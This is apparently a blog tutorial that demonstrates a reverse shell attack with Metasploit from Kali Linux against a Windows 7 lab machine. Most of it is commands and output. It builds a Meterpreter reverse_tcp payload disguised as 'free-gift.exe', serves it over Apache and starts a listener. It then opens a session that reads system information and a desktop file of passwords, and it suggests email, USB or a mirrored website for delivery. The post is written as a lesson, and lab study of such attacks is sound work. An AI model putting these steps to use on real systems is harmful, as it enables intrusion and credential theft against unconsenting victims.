Friday, June 7, 2019

Reverse Shell Attack Using Metasploit in Kali Linux

When threat actors (hackers) gain access to a system, they usually want future access as well, and they want it to be easy. A backdoor application can be installed by the attacker to either allow future access or collect information to use in further attacks. Many backdoors are installed by users clicking something without realizing that the link they clicked or the file they opened is a threat. Backdoors can also be implemented as a result of a virus, worm, or malware.

When threat actors gain access to a system, they also might be able to take several actions. The type of action depends on the level of access the threat actor has, or can achieve, and is based on permissions granted to the account compromised by the attacker. One of the most devastating actions available to an attacker is the ability to execute code within a device. Code execution could result in an adverse impact to the confidentiality, integrity, and availability of the system or network.


root@kali:~# msfvenom -h
MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /usr/bin/msfvenom [options] <var=val>
Example: /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> -f exe -o payload.exe

Options:
    -l, --list            <type>     List all modules for [type]. Types are: payloads, encoders, nops, platforms, archs, formats, all
    -p, --payload         <payload>  Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom
        --list-options               List --payload <value>'s standard, advanced and evasion options
    -f, --format          <format>   Output format (use --list formats to list)
    -e, --encoder         <encoder>  The encoder to use (use --list encoders to list)
        --smallest                   Generate the smallest possible payload using all available encoders
    -a, --arch            <arch>     The architecture to use for --payload and --encoders (use --list archs to list)
        --platform        <platform> The platform for --payload (use --list platforms to list)
    -o, --out             <path>     Save the payload to a file
    -b, --bad-chars       <list>     Characters to avoid example: '\x00\xff'
    -n, --nopsled         <length>   Prepend a nopsled of [length] size on to the payload
    -s, --space           <length>   The maximum size of the resulting payload
        --encoder-space   <length>   The maximum size of the encoded payload (defaults to the -s value)
    -i, --iterations      <count>    The number of times to encode the payload
    -c, --add-code        <path>     Specify an additional win32 shellcode file to include
    -x, --template        <path>     Specify a custom executable file to use as a template
    -k, --keep                       Preserve the --template behaviour and inject the payload as a new thread
    -v, --var-name        <value>    Specify a custom variable name to use for certain output formats
    -t, --timeout         <second>   The number of seconds to wait when reading the payload from STDIN (default 30, 0 to disable)
    -h, --help                       Show this message


root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.110 LPORT=1234 --format=exe > free-gift.exe      // LHOST IS KALI IP; CREATE A .exe WINDOWS PAYLOAD FILE
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytes

root@kali:~# ls
Desktop    Downloads      Music     Public            Templates  Videos    yersinia.log
Documents  free-gift.exe  Pictures  sshd_config.save  try2hack   websites


Run Apache web server on Kali Linux. This will be used to download the exploit on the Windows 7 machine.

root@kali:~# service apache2 status
● apache2.service - The Apache HTTP Server
   Loaded: loaded (/lib/systemd/system/apache2.service; disabled; vendor preset: disabled)
   Active: inactive (dead)
root@kali:~#
root@kali:~# service apache2 <ENTER>      // VIEW COMMAND COMMAND OPTIONS
Usage: apache2 {start|stop|graceful-stop|restart|reload|force-reload}
root@kali:~#
root@kali:~# service apache2 start
root@kali:~#
root@kali:~# service apache2 status
● apache2.service - The Apache HTTP Server
   Loaded: loaded (/lib/systemd/system/apache2.service; disabled; vendor preset: disabled)
   Active: active (running) since Wed 2018-10-17 04:58:39 EDT; 2s ago
  Process: 2278 ExecStart=/usr/sbin/apachectl start (code=exited, status=0/SUCCESS)
 Main PID: 2289 (apache2)
    Tasks: 7 (limit: 2344)
   Memory: 21.1M
   CGroup: /system.slice/apache2.service
           ├─2289 /usr/sbin/apache2 -k start
           ├─2290 /usr/sbin/apache2 -k start
           ├─2291 /usr/sbin/apache2 -k start
           ├─2292 /usr/sbin/apache2 -k start
           ├─2293 /usr/sbin/apache2 -k start
           ├─2294 /usr/sbin/apache2 -k start
           └─2295 /usr/sbin/apache2 -k start

Oct 17 04:58:39 kali systemd[1]: Starting The Apache HTTP Server...
Oct 17 04:58:39 kali apachectl[2278]: AH00558: apache2: Could not reliably determine the se
Oct 17 04:58:39 kali systemd[1]: Started The Apache HTTP Server.


Move the payload file (.exe) to the Apache folder:

root@kali:~# ls
Desktop    Downloads      Music     Public            Templates  Videos    yersinia.log
Documents  free-gift.exe  Pictures  sshd_config.save  try2hack   websites
root@kali:~#
root@kali:~# cp free-gift.exe /var/www/html
root@kali:~#
root@kali:~# cd /var/www/html
root@kali:/var/www/html#
root@kali:/var/www/html# ls
free-gift.exe  index.html  index.nginx-debian.html


You can also use GUI by clicking on Files (folder icon) > Home > copy free-gift.exe > Other locations > Computer > var > www > hmtl



Run the Metasploit database in order to successfully launch msfconsole.


root@kali:~# service postgresql status
● postgresql.service - PostgreSQL RDBMS
   Loaded: loaded (/lib/systemd/system/postgresql.service; disabled; vendor preset: disable
   Active: inactive (dead)
root@kali:~#
root@kali:~# service postgresql start
root@kali:~#
root@kali:~# service postgresql status
● postgresql.service - PostgreSQL RDBMS
   Loaded: loaded (/lib/systemd/system/postgresql.service; disabled; vendor preset: disable
   Active: active (exited) since Wed 2018-10-17 05:10:46 EDT; 2s ago
  Process: 2605 ExecStart=/bin/true (code=exited, status=0/SUCCESS)
 Main PID: 2605 (code=exited, status=0/SUCCESS)

Oct 17 05:10:46 kali systemd[1]: Starting PostgreSQL RDBMS...
Oct 17 05:10:46 kali systemd[1]: Started PostgreSQL RDBMS.


Type msfconsole to launch the Metasploit Framework and create the Windows exploit or payload.

root@kali:/var/www/html# msfconsole
[-] Failed to connect to the database: could not connect to server: Connection refused
        Is the server running on host "localhost" (::1) and accepting
        TCP/IP connections on port 5432?
could not connect to server: Connection refused
        Is the server running on host "localhost" (127.0.0.1) and accepting
        TCP/IP connections on port 5432?

[*] Starting the MetasploiT Framework console...-

[-] Failed to connect to the database: could not connect to server: Connection refused
        Is the server running on host "localhost" (::1) and accepting
        TCP/IP connections on port 5432?
could not connect to server: Connection refused
        Is the server running on host "localhost" (127.0.0.1) and accepting
        TCP/IP connections on port 5432?

                                                 
     ,           ,
    /             \
   ((__---,,,---__))
      (_) O O (_)_________
         \ _ /            |\
          o_o \   M S F   | \
               \   _____  |  *
                |||   WW|||
                |||     |||


       =[ metasploit v4.17.11-dev                         ]
+ -- --=[ 1807 exploits - 1028 auxiliary - 313 post       ]
+ -- --=[ 539 payloads - 42 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > db_status        // CONNECT TO METASPLOIT DATABASE
[*] postgresql connected to msf
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 192.168.1.110
LHOST => 192.168.1.110
msf exploit(multi/handler) > set LPORT 1234
LPORT => 1234
msf exploit(multi/handler) > show options      // VIEW PAYLOAD OPTIONS

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.110    yes       The listen address (an interface may be specified)
   LPORT     1234             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(multi/handler) > exploit -h
Usage: exploit [options]

Launches an exploitation attempt.

OPTIONS:

    -e <opt>  The payload encoder to use.  If none is specified, ENCODER is used.
    -f        Force the exploit to run regardless of the value of MinimumRank.
    -h        Help banner.
    -j        Run in the context of a job.
    -n <opt>  The NOP generator to use.  If none is specified, NOP is used.
    -o <opt>  A comma separated list of options in VAR=VAL format.
    -p <opt>  The payload to use.  If none is specified, PAYLOAD is used.
    -t <opt>  The target index or name to use.  If none is specified, TARGET is used.
    -z        Do not interact with the session after successful exploitation.

msf exploit(multi/handler) > exploit -j -z
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 192.168.1.110:1234
msf exploit(multi/handler) >


Go to Windows 7 machine and download the payload via the Apache web server running in Kali. The exploit can be transferred by using other Social Engineering attack (email, USB, mirrored website, etc).


I simply chose to Run the payload (.exe). The threat actor (hacker) will make the file (or URL) enticing in order for a successful attack.


Once the payload is downloaded and opened by the victim, Metasploit detected the session.


msf exploit(multi/handler) > exploit -j -z
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 192.168.1.110:1234
msf exploit(multi/handler) > [*] Sending stage (179779 bytes) to 192.168.1.130
[*] Meterpreter session 1 opened (192.168.1.110:1234 -> 192.168.1.130:49222) at 2018-10-17 05:26:51 -0400

msf exploit(multi/handler) > sessions -i        // VIEW SESSIONS

Active sessions
===============

  Id  Name  Type                     Information                                      Connection
  --  ----  ----                     -----------                                      ----------
  1         meterpreter x86/windows  WIN-7V0EVV4BKQJ\Administrator @ WIN-7V0EVV4BKQJ  192.168.1.110:1234 -> 192.168.1.130:49222 (192.168.1.130)


msf exploit(multi/handler) > sessions -i 1       // ESTABLISH REMOTE SESSION ON ID 1
[*] Starting interaction with 1...


Once you've establish the remote (backdoor) session, you can start doing a reconnaissance on the machine by issuing various shell commands.

meterpreter > sysinfo
Computer        : WIN-7V0EVV4BKQJ
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows


meterpreter > ipconfig

Interface  1
============
Name         : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU          : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff


Interface 11
============
Name         : Intel(R) PRO/1000 MT Network Connection
Hardware MAC : 00:0c:29:6b:99:7a
MTU          : 1500
IPv4 Address : 192.168.1.130
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::104a:e373:9974:3524
IPv6 Netmask : ffff:ffff:ffff:ffff::


Interface 12
============
Name         : Microsoft ISATAP Adapter
Hardware MAC : 00:00:00:00:00:00
MTU          : 1280
IPv6 Address : fe80::5efe:c0a8:182
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff


I created a text file in Windows 7 Desktop and put sensitive info such as usernames and passwords. Also notice the netstat output has an ESTABLISHED TCP session with Kali 192.168.1.110 on port 1234.


meterpreter > pwd       // VERIFY CURRENT DIRECTORY
C:\Users\Administrator\Desktop

meterpreter > ls      // LIST FILES
Listing: C:\Users\Administrator\Desktop
=======================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  44    fil   2018-10-17 05:32:07 -0400  PASSWORDS.txt
100666/rw-rw-rw-  950   fil   2018-09-15 23:03:29 -0400  PuTTY.lnk
100666/rw-rw-rw-  282   fil   2018-09-15 22:50:44 -0400  desktop.ini


meterpreter > cat PASSWORDS.txt      // VIEW CONTENTS OF THE FILE
cisco   cisco123

admin   cisco

admin   admin

No comments:

Post a Comment